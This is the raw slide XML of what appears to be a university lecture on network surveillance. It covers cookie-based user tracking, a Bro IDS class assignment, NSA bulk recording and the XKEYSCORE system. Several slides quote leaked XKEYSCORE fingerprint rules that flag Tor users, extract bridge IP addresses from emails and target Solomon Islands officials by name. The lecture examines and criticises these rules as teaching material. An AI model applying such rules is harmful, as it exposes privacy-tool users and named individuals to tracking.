          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="19961640" y="7101000"/>
            <a:ext cx="3569400" cy="3569400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="210" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="19881360" y="10858680"/>
            <a:ext cx="3729960" cy="2762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fill="hold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fill="hold"/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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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Tracking People Not Machines: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User Identification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Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3193920" y="2639520"/>
            <a:ext cx="18285480" cy="13600080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="214" name="Oval" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17233920" y="4401000"/>
            <a:ext cx="2225880" cy="785880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8910000" y="5058720"/>
            <a:ext cx="14958000" cy="3596040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="216" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="437400" y="7962480"/>
            <a:ext cx="18285480" cy="4755960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="217" name="Oval" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10865160" y="6804360"/>
            <a:ext cx="8205480" cy="785880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="218" name="Oval" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5477400" y="9741960"/>
            <a:ext cx="7084800" cy="78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6" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="317" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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2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3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3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4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Tracking People, Not Machines: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Cookie Linking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Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048120" y="3423600"/>
            <a:ext cx="18285480" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="222" name="Oval" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4706640" y="5713920"/>
            <a:ext cx="14968440" cy="509760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="223" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048120" y="6906960"/>
            <a:ext cx="18285480" cy="3639960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="224" name="Oval" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4706640" y="9558360"/>
            <a:ext cx="14968440" cy="509760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="225" name="Oval" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4968360" y="5487840"/>
            <a:ext cx="4689000" cy="509760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="226" name="Oval" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4968360" y="4776120"/>
            <a:ext cx="3298680" cy="509760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="227" name="Oval" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254200" y="9084600"/>
            <a:ext cx="3298680" cy="509760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="228" name="Oval" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986360" y="8543160"/>
            <a:ext cx="5445000" cy="509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3" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="344" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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4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5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59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6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6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74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2013 NSA Mass Surveillance Revelations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Edward Snowden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550440" y="3178800"/>
            <a:ext cx="1619136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Revealed that the NSA was spying on internet and telephone communications on the whole planet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General public had no idea about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Except some cypherpunks who were called conspiracy theorists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spying practices were judged illegal and unconstitutional</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6600" spc="-1" strike="noStrike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Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17083800" y="3097080"/>
            <a:ext cx="7312680" cy="88113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Homework Assignment</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="7800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>NOT SECRET//UCB//REL 194-30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28560" indent="-62604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Assignment for advanced undergraduate class in networking</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5280" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628560" indent="-62604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Given this Bro IDS skeleton code build the following primitives</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="528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HTTP title metadata extraction</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400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Username identification</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400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Cookie linking</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628560" indent="-62604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11 groups of 2 in the class:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="528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 failed to complete</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400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 did poor job (very slow, but as I never specified performance goals…)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400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9 success</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1238400" indent="-62604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5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Including 2-3 well written ones</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3520" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628560" indent="-62604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Project was probably too easy…</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5280" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="939960" indent="-6325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more open ended “bang on the great firewall” project was better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5" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="376" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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fill="hold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fill="hold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fill="hold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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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Bulk Recording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Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="583560" y="3385440"/>
            <a:ext cx="14340600" cy="10151640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600"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15542280" y="4252680"/>
            <a:ext cx="8700480" cy="9283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NSA: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Bulk record is only 3-5 days,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decision is “record or not”.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But all metadata and a lot of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the data is kept forever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GCHQ is worse!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LBNL is 3-6 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1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months</a:t>
            </a:r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, decision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includes truncation (“stop after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X bytes”)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7" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="4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Federated Search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8" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755960" y="3151800"/>
            <a:ext cx="14494680" cy="10485720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="239" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="3755" t="2959" r="3048" b="2611"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5348880" y="960336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240" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="3755" t="2959" r="3048" b="2611"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17191800" y="503280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241" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="3755" t="2959" r="3048" b="2611"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17661960" y="6794640"/>
            <a:ext cx="898560" cy="898200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="242" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="3755" t="2959" r="3048" b="2611"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197040" y="4452840"/>
            <a:ext cx="898560" cy="898200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10231920" y="12301200"/>
            <a:ext cx="4051440" cy="5378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Who Viewed This Page?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10231920" y="12301200"/>
            <a:ext cx="4051440" cy="5378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Who Viewed This Page?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45" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10231920" y="12301200"/>
            <a:ext cx="4051440" cy="5378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Who Viewed This Page?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46" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10231920" y="12301200"/>
            <a:ext cx="4051440" cy="5378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Who Viewed This Page?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9" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="430" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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8102 -0.386811">
                                      <p:cBhvr>
                                        <p:cTn id="44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7337 -0.519107">
                                      <p:cBhvr>
                                        <p:cTn id="450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9730 -0.566391">
                                      <p:cBhvr>
                                        <p:cTn id="45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0939 -0.188265">
                                      <p:cBhvr>
                                        <p:cTn id="456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Metadata is Crucial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Good American” documentary (2015)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550440" y="3178800"/>
            <a:ext cx="143539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whistle-blower Bill Binney</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="627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Developed metadata analysis tools for the NSA</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="475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After 9/11/2001 attacks, bulk metadata collection was applied to all Americans</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4750" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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Documentary shows how NSA corruption afects design of the surveillance tools</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="627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has economic interests in espionage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0" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17134560" y="3486600"/>
            <a:ext cx="6913800" cy="9771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7" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="4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Using XKEYSCORE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 Practice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550440" y="3178800"/>
            <a:ext cx="129834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Primarily centered around an easy-to-use web interface</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="627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With a lot of pre-canned search scripts for low-sophistication users</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="475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Plus a large number of premade "fingerprints" to identify applications, usages, etc</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4750" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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unofficial user guide: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="627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1"/>
              </a:rPr>
              <a:t>https://www.documentcloud.org/documents/2116191-unofficial-xks-user-guide.html</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6270" spc="-1" strike="noStrike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Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13817880" y="7895880"/>
            <a:ext cx="10707480" cy="6102360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="255" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14286960" y="4622760"/>
            <a:ext cx="10261440" cy="8596440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="256" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13695840" y="3619800"/>
            <a:ext cx="10446480" cy="6829200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14473440" y="8857080"/>
            <a:ext cx="8895600" cy="904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Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>To find suspected extremists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9" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="460" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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Drone Strikes!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National Bird” documentary (2016)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550440" y="3178800"/>
            <a:ext cx="152683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How NSA automates drone strikes on suspected terrorists</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="627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Also used in countries the US is not officially in war with</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="475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Also used against a 16-years-old</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="475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Who was a US citizen</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4750" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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Former NSA and CIA chief General Michael Hayden:</a:t>
            </a:r>
            <a:br/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“We kill people based on metadata”</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6270" spc="-1" strike="noStrike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7723520" y="4525200"/>
            <a:ext cx="5867640" cy="828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7" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="4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What is NSA Surveillance Good For?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550440" y="3178800"/>
            <a:ext cx="129823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Finding terrorists?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6270" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1116000" indent="-75168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No! It’s needles in a needle-stack</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4750" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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Works really well for economic espionage</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6270" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="746640" indent="-7441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stealing the secrets of foreign governments</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6270" spc="-1" strike="noStrike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12744360" y="3089520"/>
            <a:ext cx="11029680" cy="605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9" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="4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XKEYSCORE Fingerprint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Writing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mix of basic regular expressions and optional inline C++</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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Simple rules:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="540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fingerprint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('anonymizer/tor/bridge/tls') =</a:t>
            </a:r>
            <a:br/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ssl_x509_subject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('bridges.torproject.org') or</a:t>
            </a:r>
            <a:br/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ssl_dns_name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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4450" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>bridges.torproject.org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');</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="445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fingerprint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('anonymizer/tor/torpoject_visit') = </a:t>
            </a:r>
            <a:br/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http_host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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4450" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.torproject.org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')</a:t>
            </a:r>
            <a:br/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    and not(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4450" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff2600"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>xff_cc</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4450" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>('US' OR 'GB' OR 'CA' OR 'AU' OR 'NZ'));</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4450" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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System is "near real time":</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="540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Parse flow </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1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completely</a:t>
            </a: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then check for signature matches</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4450" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1377720" indent="-696960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="7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9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write in a different style in a real-time system like Snort or Bro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="392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it’s possible XKEYSCORE started its life as Vortex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1" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="482" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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fill="hold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fill="hold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fill="hold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Richer Rule:</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7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New Zealand spying on Solomon Island gvmt...</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff2600"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>fingerprint</a:t>
            </a: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('document/solomons_gov/gov_documents') =</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff2600"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>document_body</a:t>
            </a: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(('Memorandum by the Minister of' and 'Solomon')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'Cabinet of Solomon Islands'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('conclusions of the' and 'solomon' and 'cabinet')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('Truth and Reconciliation Commission' and 'Solomon')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('TRC 'c and 'trc report' and 'Solomon')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('former tension militants' and 'Malaita')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'malaita eagle force' or 'malaita ma\'asina forum'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('MMF 'c and 'Solomon') or 'Members Rise Group'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'Forum Solomon Islands' or 'FSII 'c or 'Benjamin Afuga')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or </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="39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b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff2600"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>document_author</a:t>
            </a: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(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff2600"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>word</a:t>
            </a:r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('rqurusu' or 'ptagini'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                   'jremobatu' or 'riroga' or 'Barnabas Anga'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                   'Robert Iroga' or 'Dr Philip Tagini' or </a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3900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                   'Fiona Indu' or 'FSII' or 'James Remobatu' or </a:t>
            </a:r>
            <a:br/>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike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7" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="518" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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Inline C++...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/**  Database Tor bridge information extracted from confirmation emails. */</a:t>
            </a:r>
            <a:br/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fingerprint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('anonymizer/tor/bridge/email') = </a:t>
            </a:r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email_address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('bridges@torproject.org') and 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email_body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('https://bridges.torproject.org/' : c++</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3959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extractors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: {{ bridges[] = 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        /bridge\s([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):?([0-9]{2,4}?[^0-9])/;  }}</a:t>
            </a:r>
